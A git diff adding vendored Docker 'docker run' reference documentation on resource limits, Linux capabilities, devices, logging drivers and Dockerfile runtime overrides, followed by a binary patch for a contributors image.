+        who just want to track kernel memory usage.
+      </td>
+    </tr>
+  </tbody>
+</table>
+
+Examples:
+
+    $ docker run -it -m 500M --kernel-memory 50M ubuntu:14.04 /bin/bash
+
+We set memory and kernel memory, so the processes in the container can use
+500M memory in total, in this 500M memory, it can be 50M kernel memory tops.
+
+    $ docker run -it --kernel-memory 50M ubuntu:14.04 /bin/bash
+
+We set kernel memory without **-m**, so the processes in the container can
+use as much memory as they want, but they can only use 50M kernel memory.
+
+### Swappiness constraint
+
+By default, a container's kernel can swap out a percentage of anonymous pages.
+To set this percentage for a container, specify a `--memory-swappiness` value
+between 0 and 100. A value of 0 turns off anonymous page swapping. A value of
+100 sets all anonymous pages as swappable. By default, if you are not using
+`--memory-swappiness`, memory swappiness value will be inherited from the parent.
+
+For example, you can set:
+
+    $ docker run -it --memory-swappiness=0 ubuntu:14.04 /bin/bash
+
+Setting the `--memory-swappiness` option is helpful when you want to retain the
+container's working set and to avoid swapping performance penalties.
+
+### CPU share constraint
+
+By default, all containers get the same proportion of CPU cycles. This proportion
+can be modified by changing the container's CPU share weighting relative
+to the weighting of all other running containers.
+
+To modify the proportion from the default of 1024, use the `-c` or `--cpu-shares`
+flag to set the weighting to 2 or higher. If 0 is set, the system will ignore the
+value and use the default of 1024.
+
+The proportion will only apply when CPU-intensive processes are running.
+When tasks in one container are idle, other containers can use the
+left-over CPU time. The actual amount of CPU time will vary depending on
+the number of containers running on the system.
+
+For example, consider three containers, one has a cpu-share of 1024 and
+two others have a cpu-share setting of 512. When processes in all three
+containers attempt to use 100% of CPU, the first container would receive
+50% of the total CPU time. If you add a fourth container with a cpu-share
+of 1024, the first container only gets 33% of the CPU. The remaining containers
+receive 16.5%, 16.5% and 33% of the CPU.
+
+On a multi-core system, the shares of CPU time are distributed over all CPU
+cores. Even if a container is limited to less than 100% of CPU time, it can
+use 100% of each individual CPU core.
+
+For example, consider a system with more than three cores. If you start one
+container `{C0}` with `-c=512` running one process, and another container
+`{C1}` with `-c=1024` running two processes, this can result in the following
+division of CPU shares:
+
+    PID    container	CPU	CPU share
+    100    {C0}		0	100% of CPU0
+    101    {C1}		1	100% of CPU1
+    102    {C1}		2	100% of CPU2
+
+### CPU period constraint
+
+The default CPU CFS (Completely Fair Scheduler) period is 100ms. We can use
+`--cpu-period` to set the period of CPUs to limit the container's CPU usage.
+And usually `--cpu-period` should work with `--cpu-quota`.
+
+Examples:
+
+    $ docker run -it --cpu-period=50000 --cpu-quota=25000 ubuntu:14.04 /bin/bash
+
+If there is 1 CPU, this means the container can get 50% CPU worth of run-time every 50ms.
+
+In addition to use `--cpu-period` and `--cpu-quota` for setting CPU period constraints,
+it is possible to specify `--cpus` with a float number to achieve the same purpose.
+For example, if there is 1 CPU, then `--cpus=0.5` will achieve the same result as
+setting `--cpu-period=50000` and `--cpu-quota=25000` (50% CPU).
+
+The default value for `--cpus` is `0.000`, which means there is no limit.
+
+For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt).
+
+### Cpuset constraint
+
+We can set cpus in which to allow execution for containers.
+
+Examples:
+
+    $ docker run -it --cpuset-cpus="1,3" ubuntu:14.04 /bin/bash
+
+This means processes in container can be executed on cpu 1 and cpu 3.
+
+    $ docker run -it --cpuset-cpus="0-2" ubuntu:14.04 /bin/bash
+
+This means processes in container can be executed on cpu 0, cpu 1 and cpu 2.
+
+We can set mems in which to allow execution for containers. Only effective
+on NUMA systems.
+
+Examples:
+
+    $ docker run -it --cpuset-mems="1,3" ubuntu:14.04 /bin/bash
+
+This example restricts the processes in the container to only use memory from
+memory nodes 1 and 3.
+
+    $ docker run -it --cpuset-mems="0-2" ubuntu:14.04 /bin/bash
+
+This example restricts the processes in the container to only use memory from
+memory nodes 0, 1 and 2.
+
+### CPU quota constraint
+
+The `--cpu-quota` flag limits the container's CPU usage. The default 0 value
+allows the container to take 100% of a CPU resource (1 CPU). The CFS (Completely Fair
+Scheduler) handles resource allocation for executing processes and is default
+Linux Scheduler used by the kernel. Set this value to 50000 to limit the container
+to 50% of a CPU resource. For multiple CPUs, adjust the `--cpu-quota` as necessary.
+For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt).
+
+### Block IO bandwidth (Blkio) constraint
+
+By default, all containers get the same proportion of block IO bandwidth
+(blkio). This proportion is 500. To modify this proportion, change the
+container's blkio weight relative to the weighting of all other running
+containers using the `--blkio-weight` flag.
+
+> **Note:** The blkio weight setting is only available for direct IO. Buffered IO
+> is not currently supported.
+
+The `--blkio-weight` flag can set the weighting to a value between 10 to 1000.
+For example, the commands below create two containers with different blkio
+weight:
+
+    $ docker run -it --name c1 --blkio-weight 300 ubuntu:14.04 /bin/bash
+    $ docker run -it --name c2 --blkio-weight 600 ubuntu:14.04 /bin/bash
+
+If you do block IO in the two containers at the same time, by, for example:
+
+    $ time dd if=/mnt/zerofile of=test.out bs=1M count=1024 oflag=direct
+
+You'll find that the proportion of time is the same as the proportion of blkio
+weights of the two containers.
+
+The `--blkio-weight-device="DEVICE_NAME:WEIGHT"` flag sets a specific device weight.
+The `DEVICE_NAME:WEIGHT` is a string containing a colon-separated device name and weight.
+For example, to set `/dev/sda` device weight to `200`:
+
+    $ docker run -it \
+        --blkio-weight-device "/dev/sda:200" \
+        ubuntu
+
+If you specify both the `--blkio-weight` and `--blkio-weight-device`, Docker
+uses the `--blkio-weight` as the default weight and uses `--blkio-weight-device`
+to override this default with a new value on a specific device.
+The following example uses a default weight of `300` and overrides this default
+on `/dev/sda` setting that weight to `200`:
+
+    $ docker run -it \
+        --blkio-weight 300 \
+        --blkio-weight-device "/dev/sda:200" \
+        ubuntu
+
+The `--device-read-bps` flag limits the read rate (bytes per second) from a device.
+For example, this command creates a container and limits the read rate to `1mb`
+per second from `/dev/sda`:
+
+    $ docker run -it --device-read-bps /dev/sda:1mb ubuntu
+
+The `--device-write-bps` flag limits the write rate (bytes per second)to a device.
+For example, this command creates a container and limits the write rate to `1mb`
+per second for `/dev/sda`:
+
+    $ docker run -it --device-write-bps /dev/sda:1mb ubuntu
+
+Both flags take limits in the `<device-path>:<limit>[unit]` format. Both read
+and write rates must be a positive integer. You can specify the rate in `kb`
+(kilobytes), `mb` (megabytes), or `gb` (gigabytes).
+
+The `--device-read-iops` flag limits read rate (IO per second) from a device.
+For example, this command creates a container and limits the read rate to
+`1000` IO per second from `/dev/sda`:
+
+    $ docker run -ti --device-read-iops /dev/sda:1000 ubuntu
+
+The `--device-write-iops` flag limits write rate (IO per second) to a device.
+For example, this command creates a container and limits the write rate to
+`1000` IO per second to `/dev/sda`:
+
+    $ docker run -ti --device-write-iops /dev/sda:1000 ubuntu
+
+Both flags take limits in the `<device-path>:<limit>` format. Both read and
+write rates must be a positive integer.
+
+## Additional groups
+    --group-add: Add additional groups to run as
+
+By default, the docker container process runs with the supplementary groups looked
+up for the specified user. If one wants to add more to that list of groups, then
+one can use this flag:
+
+    $ docker run --rm --group-add audio --group-add nogroup --group-add 777 busybox id
+    uid=0(root) gid=0(root) groups=10(wheel),29(audio),99(nogroup),777
+
+## Runtime privilege and Linux capabilities
+
+    --cap-add: Add Linux capabilities
+    --cap-drop: Drop Linux capabilities
+    --privileged=false: Give extended privileges to this container
+    --device=[]: Allows you to run devices inside the container without the --privileged flag.
+
+By default, Docker containers are "unprivileged" and cannot, for
+example, run a Docker daemon inside a Docker container. This is because
+by default a container is not allowed to access any devices, but a
+"privileged" container is given access to all devices (see
+the documentation on [cgroups devices](https://www.kernel.org/doc/Documentation/cgroup-v1/devices.txt)).
+
+When the operator executes `docker run --privileged`, Docker will enable
+to access to all devices on the host as well as set some configuration
+in AppArmor or SELinux to allow the container nearly all the same access to the
+host as processes running outside containers on the host. Additional
+information about running with `--privileged` is available on the
+[Docker Blog](http://blog.docker.com/2013/09/docker-can-now-run-within-docker/).
+
+If you want to limit access to a specific device or devices you can use
+the `--device` flag. It allows you to specify one or more devices that
+will be accessible within the container.
+
+    $ docker run --device=/dev/snd:/dev/snd ...
+
+By default, the container will be able to `read`, `write`, and `mknod` these devices.
+This can be overridden using a third `:rwm` set of options to each `--device` flag:
+
+    $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk  /dev/xvdc
+
+    Command (m for help): q
+    $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk  /dev/xvdc
+    You will not be able to write the partition table.
+
+    Command (m for help): q
+
+    $ docker run --device=/dev/sda:/dev/xvdc:w --rm -it ubuntu fdisk  /dev/xvdc
+        crash....
+
+    $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk  /dev/xvdc
+    fdisk: unable to open /dev/xvdc: Operation not permitted
+
+In addition to `--privileged`, the operator can have fine grain control over the
+capabilities using `--cap-add` and `--cap-drop`. By default, Docker has a default
+list of capabilities that are kept. The following table lists the Linux capability
+options which are allowed by default and can be dropped.
+
+| Capability Key   | Capability Description                                                                                                        |
+| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- |
+| SETPCAP          | Modify process capabilities.                                                                                                  |
+| MKNOD            | Create special files using mknod(2).                                                                                          |
+| AUDIT_WRITE      | Write records to kernel auditing log.                                                                                         |
+| CHOWN            | Make arbitrary changes to file UIDs and GIDs (see chown(2)).                                                                  |
+| NET_RAW          | Use RAW and PACKET sockets.                                                                                                   |
+| DAC_OVERRIDE     | Bypass file read, write, and execute permission checks.                                                                       |
+| FOWNER           | Bypass permission checks on operations that normally require the file system UID of the process to match the UID of the file. |
+| FSETID           | Don't clear set-user-ID and set-group-ID permission bits when a file is modified.                                             |
+| KILL             | Bypass permission checks for sending signals.                                                                                 |
+| SETGID           | Make arbitrary manipulations of process GIDs and supplementary GID list.                                                      |
+| SETUID           | Make arbitrary manipulations of process UIDs.                                                                                 |
+| NET_BIND_SERVICE | Bind a socket to internet domain privileged ports (port numbers less than 1024).                                              |
+| SYS_CHROOT       | Use chroot(2), change root directory.                                                                                         |
+| SETFCAP          | Set file capabilities.                                                                                                        |
+
+The next table shows the capabilities which are not granted by default and may be added.
+
+| Capability Key   | Capability Description                                                                                                        |
+| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- |
+| SYS_MODULE       | Load and unload kernel modules.                                                                                               |
+| SYS_RAWIO        | Perform I/O port operations (iopl(2) and ioperm(2)).                                                                          |
+| SYS_PACCT        | Use acct(2), switch process accounting on or off.                                                                             |
+| SYS_ADMIN        | Perform a range of system administration operations.                                                                          |
+| SYS_NICE         | Raise process nice value (nice(2), setpriority(2)) and change the nice value for arbitrary processes.                         |
+| SYS_RESOURCE     | Override resource Limits.                                                                                                     |
+| SYS_TIME         | Set system clock (settimeofday(2), stime(2), adjtimex(2)); set real-time (hardware) clock.                                    |
+| SYS_TTY_CONFIG   | Use vhangup(2); employ various privileged ioctl(2) operations on virtual terminals.                                           |
+| AUDIT_CONTROL    | Enable and disable kernel auditing; change auditing filter rules; retrieve auditing status and filtering rules.               |
+| MAC_OVERRIDE     | Allow MAC configuration or state changes. Implemented for the Smack LSM.                                                      |
+| MAC_ADMIN        | Override Mandatory Access Control (MAC). Implemented for the Smack Linux Security Module (LSM).                               |
+| NET_ADMIN        | Perform various network-related operations.                                                                                   |
+| SYSLOG           | Perform privileged syslog(2) operations.                                                                                      |
+| DAC_READ_SEARCH  | Bypass file read permission checks and directory read and execute permission checks.                                          |
+| LINUX_IMMUTABLE  | Set the FS_APPEND_FL and FS_IMMUTABLE_FL i-node flags.                                                                        |
+| NET_BROADCAST    | Make socket broadcasts, and listen to multicasts.                                                                             |
+| IPC_LOCK         | Lock memory (mlock(2), mlockall(2), mmap(2), shmctl(2)).                                                                      |
+| IPC_OWNER        | Bypass permission checks for operations on System V IPC objects.                                                              |
+| SYS_PTRACE       | Trace arbitrary processes using ptrace(2).                                                                                    |
+| SYS_BOOT         | Use reboot(2) and kexec_load(2), reboot and load a new kernel for later execution.                                            |
+| LEASE            | Establish leases on arbitrary files (see fcntl(2)).                                                                           |
+| WAKE_ALARM       | Trigger something that will wake up the system.                                                                               |
+| BLOCK_SUSPEND    | Employ features that can block system suspend.                                                                                |
+
+Further reference information is available on the [capabilities(7) - Linux man page](http://man7.org/linux/man-pages/man7/capabilities.7.html)
+
+Both flags support the value `ALL`, so if the
+operator wants to have all capabilities but `MKNOD` they could use:
+
+    $ docker run --cap-add=ALL --cap-drop=MKNOD ...
+
+For interacting with the network stack, instead of using `--privileged` they
+should use `--cap-add=NET_ADMIN` to modify the network interfaces.
+
+    $ docker run -it --rm  ubuntu:14.04 ip link add dummy0 type dummy
+    RTNETLINK answers: Operation not permitted
+    $ docker run -it --rm --cap-add=NET_ADMIN ubuntu:14.04 ip link add dummy0 type dummy
+
+To mount a FUSE based filesystem, you need to combine both `--cap-add` and
+`--device`:
+
+    $ docker run --rm -it --cap-add SYS_ADMIN sshfs sshfs sven@10.10.10.20:/home/sven /mnt
+    fuse: failed to open /dev/fuse: Operation not permitted
+    $ docker run --rm -it --device /dev/fuse sshfs sshfs sven@10.10.10.20:/home/sven /mnt
+    fusermount: mount failed: Operation not permitted
+    $ docker run --rm -it --cap-add SYS_ADMIN --device /dev/fuse sshfs
+    # sshfs sven@10.10.10.20:/home/sven /mnt
+    The authenticity of host '10.10.10.20 (10.10.10.20)' can't be established.
+    ECDSA key fingerprint is 25:34:85:75:25:b0:17:46:05:19:04:93:b5:dd:5f:c6.
+    Are you sure you want to continue connecting (yes/no)? yes
+    sven@10.10.10.20's password:
+    root@30aa0cfaf1b5:/# ls -la /mnt/src/docker
+    total 1516
+    drwxrwxr-x 1 1000 1000   4096 Dec  4 06:08 .
+    drwxrwxr-x 1 1000 1000   4096 Dec  4 11:46 ..
+    -rw-rw-r-- 1 1000 1000     16 Oct  8 00:09 .dockerignore
+    -rwxrwxr-x 1 1000 1000    464 Oct  8 00:09 .drone.yml
+    drwxrwxr-x 1 1000 1000   4096 Dec  4 06:11 .git
+    -rw-rw-r-- 1 1000 1000    461 Dec  4 06:08 .gitignore
+    ....
+
+The default seccomp profile will adjust to the selected capabilities, in order to allow
+use of facilities allowed by the capabilities, so you should not have to adjust this,
+since Docker 1.12. In Docker 1.10 and 1.11 this did not happen and it may be necessary
+to use a custom seccomp profile or use `--security-opt seccomp=unconfined` when adding
+capabilities.
+
+## Logging drivers (--log-driver)
+
+The container can have a different logging driver than the Docker daemon. Use
+the `--log-driver=VALUE` with the `docker run` command to configure the
+container's logging driver. The following options are supported:
+
+| Driver      | Description                                                                                                                   |
+| ----------- | ----------------------------------------------------------------------------------------------------------------------------- |
+| `none`      | Disables any logging for the container. `docker logs` won't be available with this driver.                                    |
+| `json-file` | Default logging driver for Docker. Writes JSON messages to file.  No logging options are supported for this driver.           |
+| `syslog`    | Syslog logging driver for Docker. Writes log messages to syslog.                                                              |
+| `journald`  | Journald logging driver for Docker. Writes log messages to `journald`.                                                        |
+| `gelf`      | Graylog Extended Log Format (GELF) logging driver for Docker. Writes log messages to a GELF endpoint likeGraylog or Logstash. |
+| `fluentd`   | Fluentd logging driver for Docker. Writes log messages to `fluentd` (forward input).                                          |
+| `awslogs`   | Amazon CloudWatch Logs logging driver for Docker. Writes log messages to Amazon CloudWatch Logs                               |
+| `splunk`    | Splunk logging driver for Docker. Writes log messages to `splunk` using Event Http Collector.                                 |
+
+The `docker logs` command is available only for the `json-file` and `journald`
+logging drivers.  For detailed information on working with logging drivers, see
+[Configure a logging driver](https://docs.docker.com/engine/admin/logging/overview/).
+
+
+## Overriding Dockerfile image defaults
+
+When a developer builds an image from a [*Dockerfile*](builder.md)
+or when she commits it, the developer can set a number of default parameters
+that take effect when the image starts up as a container.
+
+Four of the Dockerfile commands cannot be overridden at runtime: `FROM`,
+`MAINTAINER`, `RUN`, and `ADD`. Everything else has a corresponding override
+in `docker run`. We'll go through what the developer might have set in each
+Dockerfile instruction and how the operator can override that setting.
+
+ - [CMD (Default Command or Options)](#cmd-default-command-or-options)
+ - [ENTRYPOINT (Default Command to Execute at Runtime)](
+    #entrypoint-default-command-to-execute-at-runtime)
+ - [EXPOSE (Incoming Ports)](#expose-incoming-ports)
+ - [ENV (Environment Variables)](#env-environment-variables)
+ - [HEALTHCHECK](#healthcheck)
+ - [VOLUME (Shared Filesystems)](#volume-shared-filesystems)
+ - [USER](#user)
+ - [WORKDIR](#workdir)
+
+### CMD (default command or options)
+
+Recall the optional `COMMAND` in the Docker
+commandline:
+
+    $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...]
+
+This command is optional because the person who created the `IMAGE` may
+have already provided a default `COMMAND` using the Dockerfile `CMD`
+instruction. As the operator (the person running a container from the
+image), you can override that `CMD` instruction just by specifying a new
+`COMMAND`.
+
+If the image also specifies an `ENTRYPOINT` then the `CMD` or `COMMAND`
+get appended as arguments to the `ENTRYPOINT`.
+
+### ENTRYPOINT (default command to execute at runtime)
+
+    --entrypoint="": Overwrite the default entrypoint set by the image
+
+The `ENTRYPOINT` of an image is similar to a `COMMAND` because it
+specifies what executable to run when the container starts, but it is
+(purposely) more difficult to override. The `ENTRYPOINT` gives a
+container its default nature or behavior, so that when you set an
+`ENTRYPOINT` you can run the container *as if it were that binary*,
+complete with default options, and you can pass in more options via the
+`COMMAND`. But, sometimes an operator may want to run something else
+inside the container, so you can override the default `ENTRYPOINT` at
+runtime by using a string to specify the new `ENTRYPOINT`. Here is an
+example of how to run a shell in a container that has been set up to
+automatically run something else (like `/usr/bin/redis-server`):
+
+    $ docker run -it --entrypoint /bin/bash example/redis
+
+or two examples of how to pass more parameters to that ENTRYPOINT:
+
+    $ docker run -it --entrypoint /bin/bash example/redis -c ls -l
+    $ docker run -it --entrypoint /usr/bin/redis-cli example/redis --help
+
+You can reset a containers entrypoint by passing an empty string, for example:
+
+    $ docker run -it --entrypoint="" mysql bash
+
+> **Note**: Passing `--entrypoint` will clear out any default command set on the
+> image (i.e. any `CMD` instruction in the Dockerfile used to build it).
+
+### EXPOSE (incoming ports)
+
+The following `run` command options work with container networking:
+
+    --expose=[]: Expose a port or a range of ports inside the container.
+                 These are additional to those exposed by the `EXPOSE` instruction
+    -P         : Publish all exposed ports to the host interfaces
+    -p=[]      : Publish a container᾿s port or a range of ports to the host
+                   format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort
+                   Both hostPort and containerPort can be specified as a
+                   range of ports. When specifying ranges for both, the
+                   number of container ports in the range must match the
+                   number of host ports in the range, for example:
+                       -p 1234-1236:1234-1236/tcp
+
+                   When specifying a range for hostPort only, the
+                   containerPort must not be a range.  In this case the
+                   container port is published somewhere within the
+                   specified hostPort range. (e.g., `-p 1234-1236:1234/tcp`)
+
+                   (use 'docker port' to see the actual mapping)
+
+    --link=""  : Add link to another container (<name or id>:alias or <name or id>)
+
+With the exception of the `EXPOSE` directive, an image developer hasn't
+got much control over networking. The `EXPOSE` instruction defines the
+initial incoming ports that provide services. These ports are available
+to processes inside the container. An operator can use the `--expose`
+option to add to the exposed ports.
+
+To expose a container's internal port, an operator can start the
+container with the `-P` or `-p` flag. The exposed port is accessible on
+the host and the ports are available to any client that can reach the
+host.
+
+The `-P` option publishes all the ports to the host interfaces. Docker
+binds each exposed port to a random port on the host. The range of
+ports are within an *ephemeral port range* defined by
+`/proc/sys/net/ipv4/ip_local_port_range`. Use the `-p` flag to
+explicitly map a single port or range of ports.
+
+The port number inside the container (where the service listens) does
+not need to match the port number exposed on the outside of the
+container (where clients connect). For example, inside the container an
+HTTP service is listening on port 80 (and so the image developer
+specifies `EXPOSE 80` in the Dockerfile). At runtime, the port might be
+bound to 42800 on the host. To find the mapping between the host ports
+and the exposed ports, use `docker port`.
+
+If the operator uses `--link` when starting a new client container in the
+default bridge network, then the client container can access the exposed
+port via a private networking interface.
+If `--link` is used when starting a container in a user-defined network as
+described in [*Docker network overview*](https://docs.docker.com/engine/userguide/networking/),
+it will provide a named alias for the container being linked to.
+
+### ENV (environment variables)
+
+When a new container is created, Docker will set the following environment
+variables automatically:
+
+| Variable | Value |
+| -------- | ----- |
+| `HOME` | Set based on the value of `USER` |
+| `HOSTNAME` | The hostname associated with the container |
+| `PATH` | Includes popular directories, such as `:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin` |
+| `TERM` | `xterm` if the container is allocated a pseudo-TTY |
+
+Additionally, the operator can **set any environment variable** in the
+container by using one or more `-e` flags, even overriding those mentioned
+above, or already defined by the developer with a Dockerfile `ENV`:
+
+    $ docker run -e "deep=purple" --rm ubuntu /bin/bash -c export
+    declare -x HOME="/"
+    declare -x HOSTNAME="85bc26a0e200"
+    declare -x OLDPWD
+    declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+    declare -x PWD="/"
+    declare -x SHLVL="1"
+    declare -x deep="purple"
+
+Similarly the operator can set the **hostname** with `-h`.
+
+### HEALTHCHECK
+
+```
+  --health-cmd            Command to run to check health
+  --health-interval       Time between running the check
+  --health-retries        Consecutive failures needed to report unhealthy
+  --health-timeout        Maximum time to allow one check to run
+  --no-healthcheck        Disable any container-specified HEALTHCHECK
+```
+
+Example:
+
+    {% raw %}
+    $ docker run --name=test -d \
+        --health-cmd='stat /etc/passwd || exit 1' \
+        --health-interval=2s \
+        busybox sleep 1d
+    $ sleep 2; docker inspect --format='{{.State.Health.Status}}' test
+    healthy
+    $ docker exec test rm /etc/passwd
+    $ sleep 2; docker inspect --format='{{json .State.Health}}' test
+    {
+      "Status": "unhealthy",
+      "FailingStreak": 3,
+      "Log": [
+        {
+          "Start": "2016-05-25T17:22:04.635478668Z",
+          "End": "2016-05-25T17:22:04.7272552Z",
+          "ExitCode": 0,
+          "Output": "  File: /etc/passwd\n  Size: 334       \tBlocks: 8          IO Block: 4096   regular file\nDevice: 32h/50d\tInode: 12          Links: 1\nAccess: (0664/-rw-rw-r--)  Uid: (    0/    root)   Gid: (    0/    root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..."
+        },
+        {
+          "Start": "2016-05-25T17:22:06.732900633Z",
+          "End": "2016-05-25T17:22:06.822168935Z",
+          "ExitCode": 0,
+          "Output": "  File: /etc/passwd\n  Size: 334       \tBlocks: 8          IO Block: 4096   regular file\nDevice: 32h/50d\tInode: 12          Links: 1\nAccess: (0664/-rw-rw-r--)  Uid: (    0/    root)   Gid: (    0/    root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..."
+        },
+        {
+          "Start": "2016-05-25T17:22:08.823956535Z",
+          "End": "2016-05-25T17:22:08.897359124Z",
+          "ExitCode": 1,
+          "Output": "stat: can't stat '/etc/passwd': No such file or directory\n"
+        },
+        {
+          "Start": "2016-05-25T17:22:10.898802931Z",
+          "End": "2016-05-25T17:22:10.969631866Z",
+          "ExitCode": 1,
+          "Output": "stat: can't stat '/etc/passwd': No such file or directory\n"
+        },
+        {
+          "Start": "2016-05-25T17:22:12.971033523Z",
+          "End": "2016-05-25T17:22:13.082015516Z",
+          "ExitCode": 1,
+          "Output": "stat: can't stat '/etc/passwd': No such file or directory\n"
+        }
+      ]
+    }
+    {% endraw %}
+
+The health status is also displayed in the `docker ps` output.
+
+### TMPFS (mount tmpfs filesystems)
+
+```bash
+--tmpfs=[]: Create a tmpfs mount with: container-dir[:<options>],
+            where the options are identical to the Linux
+            'mount -t tmpfs -o' command.
+```
+
+The example below mounts an empty tmpfs into the container with the `rw`,
+`noexec`, `nosuid`, and `size=65536k` options.
+
+    $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image
+
+### VOLUME (shared filesystems)
+
+    -v, --volume=[host-src:]container-dest[:<options>]: Bind mount a volume.
+    The comma-delimited `options` are [rw|ro], [z|Z],
+    [[r]shared|[r]slave|[r]private], and [nocopy].
+    The 'host-src' is an absolute path or a name value.
+
+    If neither 'rw' or 'ro' is specified then the volume is mounted in
+    read-write mode.
+
+    The `nocopy` modes is used to disable automatic copying requested volume
+    path in the container to the volume storage location.
+    For named volumes, `copy` is the default mode. Copy modes are not supported
+    for bind-mounted volumes.
+
+    --volumes-from="": Mount all volumes from the given container(s)
+
+> **Note**:
+> When using systemd to manage the Docker daemon's start and stop, in the systemd
+> unit file there is an option to control mount propagation for the Docker daemon
+> itself, called `MountFlags`. The value of this setting may cause Docker to not
+> see mount propagation changes made on the mount point. For example, if this value
+> is `slave`, you may not be able to use the `shared` or `rshared` propagation on
+> a volume.
+
+The volumes commands are complex enough to have their own documentation
+in section [*Manage data in
+containers*](https://docs.docker.com/engine/tutorials/dockervolumes/). A developer can define
+one or more `VOLUME`'s associated with an image, but only the operator
+can give access from one container to another (or from a container to a
+volume mounted on the host).
+
+The `container-dest` must always be an absolute path such as `/src/docs`.
+The `host-src` can either be an absolute path or a `name` value. If you
+supply an absolute path for the `host-dir`, Docker bind-mounts to the path
+you specify. If you supply a `name`, Docker creates a named volume by that `name`.
+
+A `name` value must start with an alphanumeric character,
+followed by `a-z0-9`, `_` (underscore), `.` (period) or `-` (hyphen).
+An absolute path starts with a `/` (forward slash).
+
+For example, you can specify either `/foo` or `foo` for a `host-src` value.
+If you supply the `/foo` value, Docker creates a bind-mount. If you supply
+the `foo` specification, Docker creates a named volume.
+
+### USER
+
+`root` (id = 0) is the default user within a container. The image developer can
+create additional users. Those users are accessible by name.  When passing a numeric
+ID, the user does not have to exist in the container.
+
+The developer can set a default user to run the first process with the
+Dockerfile `USER` instruction. When starting a container, the operator can override
+the `USER` instruction by passing the `-u` option.
+
+    -u="", --user="": Sets the username or UID used and optionally the groupname or GID for the specified command.
+
+    The followings examples are all valid:
+    --user=[ user | user:group | uid | uid:gid | user:gid | uid:group ]
+
+> **Note:** if you pass a numeric uid, it must be in the range of 0-2147483647.
+
+### WORKDIR
+
+The default working directory for running binaries within a container is the
+root directory (`/`), but the developer can set a different default with the
+Dockerfile `WORKDIR` command. The operator can override this with:
+
+    -w="": Working directory inside the container
diff --git a/vendor/github.com/docker/docker/docs/static_files/contributors.png b/vendor/github.com/docker/docker/docs/static_files/contributors.png
new file mode 100644
index 0000000000000000000000000000000000000000..63c0a0c09b58bce2e1ade867760a937612934202
GIT binary patch
literal 23100
zcmb@OV{j(E_x888ZEbB^Tbp;=t!>=3ZQHint!;a2+qU)J@BCgqZ=W|wCYelTGH1?Q
z`J8JKt|%{o0E-Lz<HrvKDM?Y~A3s32{*9}kA^)}4-+v<ibs&z)62E@bOyi&a_#yN|
zN>o_Y4dhY>#tUQd@oOt3`ho<czZ)7xMiJNt!Q7hEid>OL|BKcJqN3Vxy$AhV?ax|X
zwP7_xdmcs=u4=&I4-7>PVT51Et0V?6adF`Fly>RguBKa_?u?$lQ0phh>{!;bJF?oY
zC)<v5?sbGHv%z?voDfg&|8nO!3LX1RgZ%%W5VErG{i_Ladf3R1NaZUE{Sp5I%+~bM
z!~VRFKI2%YZTTHCJx`^<QOG~Qagsf9-NKgAtsA6RlKle{E2D$03yqUgV%^PWTvme#
zUN8jZxxRwazM=7!=6vxSAO8;xtU$|Zyq7uN7IsQh#F2S3!%jwE<RvkZ7+ZahVj1-d
zSS)07Ak8`8q6i<z1*}?#D82eX*!qP3lZbH9Ek~x)%N}iac}9IWv#?6%7MR>U*RkjI
zsZ{9ymFQPP=Ffni?-C9P+OC9;+m(1`#sifR2o?cG#SMq<7^FFga@MBPTZc}}8{OtP
z!CXnufoQzjhXU6pDu?FO?q?N~x)gG+s5_)nwFPTwBYb7~CibK72sE%1)SrJd^${!^
zEHw&Dtkf^i4vaU^uU^}gy=)4@H#0a?oWg*dF~t!rx~8uPt`)MO;*-1xScpDwk8Yd6
zV|oWAE&v<#MZbeL_k~-u+`8|Wmvs+s;S27<SU^P!SeIGPa-hQVCA`De-3k6>t7f}(
zmXlHcCaBX3IF<@+Er8_&TT#hEUm$9AWJhM+a2DG>$2af5AN|C9xfYFRFuLL?G1+^h
z)!T!@8{JnMuGS?na}ca1a>7RB3N7|6Ju30;Ef@hw{DK01K4-F7z?<viMn;B!ZzJM*
zClA&xSz93_X|318zEgf84#YA}Y1)E;*6A&;I_LUcfPo+r$Tz=N(IW4skMEx<odaLC
z*Q{(Q5^?NB72;(M)?T6jjN-iX5w3x89$@a?EK|l!HAl)#t6?EMl-IYn&QD({>2a1d
z6xYB&;G|Ie<*=I5*<4$#T&O(X^Lx-a9hgg%5-@!cNcW>GOGntHUgUcesfkwoDU2}(
zp^XvJc&>8m=-3u88Wgay@j*@{{4f45)4=9Jiy38dDa1naT<3nu?&eE&0d1Rn`W{JW
z+U8LtqZPyYp%!)zg2B{3Lbkcu{ZEP<^T>cg)(%UgkghgLTC7~CpI^-|9klpVyAWH7
zHV%sv1WpJwWSw3XfkAq0r09b)a@xX9bKHO9xrn_r-#E&xkbhxq3~^b?MMfTMrD`?h
zS1|01CL;=KT9+@O+wU!YZtx6RE#mF=ft=3IwPZU@AV(b-C>&!>dN-kzGwftdTF&rd
zV2HwHnX$g0Btk=EJ0UuWB9?h;sVo?F6sphY7i^nLa<MG{miHzJ;-Ru@<Um@pZI<Ax
zQMJ|(2WszPFNDTN&Ve_w)E}Q6Mh7-6yUkXHS=|iu@8b8*cEd+iiW>qx;0#|-1_NIN
znQ=;!ID#{lTECe0DwM(&vRwJD*)Gz$_3@es`+CpqM7Q%IYfT1VZ34@S>|}^$zHlkX
zqF8IhE*z}@E5)`|)vYmMV8Fuuwl#g)M;dnrznCsx^)FDd&2BGw3%jIv9)+lZGfX0)
zYXR{+(nD1^wvq>61Pi@=cYUqu1fPu({)DXZT}E*gsEJb65~g}4&2#wpn~EreB`Aiq
